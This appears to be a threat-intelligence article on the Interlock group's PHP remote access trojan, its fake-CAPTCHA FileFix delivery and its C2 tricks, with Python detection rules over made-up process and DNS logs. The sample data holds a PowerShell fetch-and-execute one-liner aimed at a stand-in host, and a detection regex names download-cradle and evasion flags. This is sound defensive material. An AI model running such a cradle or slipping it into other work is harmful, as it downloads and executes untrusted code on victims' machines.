The Interlock ransomware group has changed a core piece of its tooling. It now deploys a version of its Remote Access Trojan (RAT) written in PHP, where the earlier tool was built on JavaScript and Node.js. The delivery activity has been tied since May 2025 to the KongTuke (LandUpdate808) threat cluster, and the PHP variant itself has been observed since June 2025. In practical terms, detections and hunts written around the Node.js tooling will not match the new interpreter or its process chain, so defenders need to update what they look for.
How They Trick Victims: The FileFix Method
Interlock delivers the new RAT through FileFix, a variant of the ClickFix social-engineering technique. The chain begins on legitimate websites that have been compromised: a hidden snippet of injected code in the site's HTML renders a fake CAPTCHA prompt ("Verify you are human") over the page. Instead of solving a real challenge, the victim is instructed to open a Run prompt and paste what is already on the clipboard. The injected page has placed a PowerShell one-liner there, so pasting and pressing Enter executes it, and that script fetches and launches the PHP-based RAT, giving the attackers a foothold on the machine. Nothing here exploits a software flaw; the only "vulnerability" used is a user following instructions, which is why the detection opportunity lies in the resulting process chain rather than in any exploit signature.
What the New Malware Can Do
Once running, the Interlock RAT begins with system reconnaissance. It first determines its privilege level (regular user, administrator, or SYSTEM), then enumerates running processes, services, drives, and network configuration and packages the results as JSON for the operators. It then contacts a remote server to download and execute additional payloads, either executables (.exe) or libraries (.dll). Beyond this automated collection, the telemetry shows hands-on-keyboard discovery: commands that query Active Directory, enumerate user accounts, and locate domain controllers, which indicates a human operator interacting with the host rather than a purely scripted routine.
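The delivery chain from the previous section (Explorer spawning a hidden PowerShell that drops a PHP interpreter) and the discovery activity described above can both be hunted in process-creation telemetry. The Python below is an added example written for this article; it is not code from the Interlock RAT, from the researchers who analysed it, or from any vendor. It runs three rules over a handful of constructed Sysmon-style process records. File paths, process IDs, command lines and the stage.example.invalid URL are all made up, and the rule that php.exe under AppData, ProgramData or a temp directory is suspicious is an assumption about where a dropped interpreter would land, not a detail from the report.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "pid rule detail")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PHP = r"C:\Users\alice\AppData\Roaming\php\php.exe"   # assumed drop location

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # FileFix/ClickFix: the pasted text starts a hidden PowerShell under Explorer
    {"pid": 5320, "ppid": 4100, "image": PS,
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://stage.example.invalid/i | iex"'},
    # a PHP interpreter dropped into a user-writable directory
    {"pid": 5400, "ppid": 5320, "image": PHP, "cmdline": f'"{PHP}" cfg.php'},
    # hands-on-keyboard discovery spawned beneath the interpreter
    {"pid": 5500, "ppid": 5400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c nltest /dclist:corp.example"},
    {"pid": 5510, "ppid": 5400, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
    # benign: an admin launches a script from Explorer, no evasion flags
    {"pid": 6000, "ppid": 4100, "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    # benign: the same discovery command from an ordinary interactive shell
    {"pid": 6100, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 6110, "ppid": 6100, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# flags and download-cradle tokens typical of pasted ClickFix/FileFix one-liners
EVASION_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(c|nc|ncodedcommand)?\s|-e(p|xecutionpolicy)\s+bypass|"
    r"\biwr\b|\biex\b|invoke-webrequest|invoke-expression|downloadstring", re.I)
# interpreter living where an unprivileged user can write (assumption, see lead-in)
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)
# commands used to map the domain: accounts, groups, controllers, trusts
DISCOVERY_RE = re.compile(
    r"\b(whoami|nltest|systeminfo|ipconfig|dsquery|net\s+(user|group|view|localgroup)|"
    r"get-ad(user|computer|domain|group))\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(pid, by_pid):
    """Yield ancestors of pid, nearest first; stops at unknown or cyclic pids.
    Real telemetry should key on ProcessGuid, since pids are reused."""
    seen = set()
    cur = by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        yield cur


def detect(events):
    """Return Finding records for the three rules, delivery rules first."""
    by_pid = {e["pid"]: e for e in events}
    findings, suspicious_interp = [], set()
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        # Rule 1: PowerShell started by Explorer with hide/bypass/cradle tokens
        if (img in POWERSHELL and parent and basename(parent["image"]) == "explorer.exe"
                and EVASION_RE.search(e["cmdline"])):
            findings.append(Finding(e["pid"], "filefix_powershell_from_explorer", e["cmdline"]))
        # Rule 2: php.exe executing from a user-writable path
        if img == "php.exe" and USER_WRITABLE_RE.search(e["image"]):
            suspicious_interp.add(e["pid"])
            findings.append(Finding(e["pid"], "php_interpreter_in_user_path", e["image"]))
    for e in events:
        # Rule 3: discovery commands anywhere beneath a flagged interpreter
        if DISCOVERY_RE.search(e["cmdline"]) and any(
                a["pid"] in suspicious_interp for a in lineage(e["pid"], by_pid)):
            findings.append(Finding(e["pid"], "discovery_under_php_rat", e["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid:<6} {f.rule:34} {f.detail}")
```

The third rule is deliberately scoped to the interpreter's descendants: `whoami /all` from an ordinary shell (pid 6110) is not flagged, while the same command under php.exe is, which is the difference between an administrator at work and an operator on a fresh foothold.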
Staying Hidden and Resilient
One of the more concerning properties of the new RAT is how it keeps its command and control (C2) channel alive. The malware talks to its operators through Cloudflare Tunnel URLs on trycloudflare.com, a legitimate service, so the hostname resolves to Cloudflare's edge rather than to the attackers' server and the true C2 origin is hidden from anyone inspecting traffic or resolving the name. Because trycloudflare.com is widely used for legitimate quick tunnels, the useful signal is which process resolves it and from where, not the domain alone. Should the tunnel be taken down, the RAT falls back to IP addresses hard-coded in its source. The malware also executes operator-issued commands, establishes persistence through registry keys, and can shut itself down on command.
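To turn the C2 description into a concrete hunt, here is an added example (mine, not the page's or any vendor's code) that runs over constructed Sysmon-style DNS-query and network-connection records. It flags any lookup for a trycloudflare.com subdomain and, to catch hard-coded fallback addresses without knowing them in advance, any outbound connection to a public IP that no DNS answer on the host produced shortly beforehand. The tunnel hostname, process paths, timestamps and the RFC 5737 documentation addresses are all made up.

```python
import ipaddress
from datetime import datetime, timedelta

PHP = r"C:\Users\alice\AppData\Roaming\php\php.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed Sysmon-style records: event 22 = DNS query, event 3 = network
# connection. Hostnames, paths and addresses are made up (RFC 5737 ranges).
SAMPLE_RECORDS = [
    {"ts": "2025-06-20T10:00:00", "event": 22, "image": PHP,
     "query": "quiet-river-harbor-sky.trycloudflare.com", "answers": ["198.51.100.7"]},
    {"ts": "2025-06-20T10:00:01", "event": 3, "image": PHP,
     "dst_ip": "198.51.100.7", "dst_port": 443},
    {"ts": "2025-06-20T10:00:05", "event": 22, "image": CHROME,
     "query": "www.example.com", "answers": ["203.0.113.80"]},
    {"ts": "2025-06-20T10:00:06", "event": 3, "image": CHROME,
     "dst_ip": "203.0.113.80", "dst_port": 443},
    {"ts": "2025-06-20T10:01:00", "event": 3, "image": SVCHOST,
     "dst_ip": "10.0.0.5", "dst_port": 445},
    # tunnel gone: the RAT falls back to an address that was never resolved
    {"ts": "2025-06-20T10:20:00", "event": 3, "image": PHP,
     "dst_ip": "203.0.113.45", "dst_port": 443},
]

TUNNEL_SUFFIX = ".trycloudflare.com"
# How long a DNS answer is allowed to "explain" a later connection to that
# address. Tune to the TTLs seen in your environment.
RESOLUTION_WINDOW = timedelta(minutes=10)

# Explicit internal ranges instead of ipaddress.is_global: the sample uses
# RFC 5737 documentation addresses, which Python also reports as non-global,
# and those must count as "public" here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip):
    """True for RFC 1918, loopback and link-local addresses."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_c2(records, window=RESOLUTION_WINDOW):
    """Return (rule, image, detail) findings in timestamp order.

    Rule 1: any DNS query for a trycloudflare.com subdomain.
    Rule 2: an outbound connection to a public address that no DNS answer
            on the host produced within `window` beforehand, i.e. a
            hard-coded IP such as a C2 fallback.
    """
    findings = []
    # keyed by address, not by process: the Windows resolver cache lets a
    # second process reuse an answer without issuing its own query
    last_resolved = {}
    for rec in sorted(records, key=lambda r: r["ts"]):
        ts = datetime.fromisoformat(rec["ts"])
        if rec["event"] == 22:
            name = rec["query"].lower().rstrip(".")
            if name.endswith(TUNNEL_SUFFIX):
                findings.append(("trycloudflare_tunnel_lookup", rec["image"], name))
            for ip in rec.get("answers", []):
                last_resolved[ip] = ts
        elif rec["event"] == 3:
            ip = rec["dst_ip"]
            if is_internal(ip):
                continue
            seen = last_resolved.get(ip)
            if seen is None or ts - seen > window:
                findings.append(("connection_without_dns", rec["image"],
                                 f"{ip}:{rec['dst_port']}"))
    return findings


if __name__ == "__main__":
    for rule, image, detail in detect_c2(SAMPLE_RECORDS):
        print(f"{rule:28} {image}  {detail}")
```

The second rule produces noise from software that legitimately hard-codes addresses (update agents, some VPN clients), so in practice it is best combined with the process-based rules: a connection without a preceding lookup is far more interesting when the initiating image is php.exe under a user profile than when it is a signed updater.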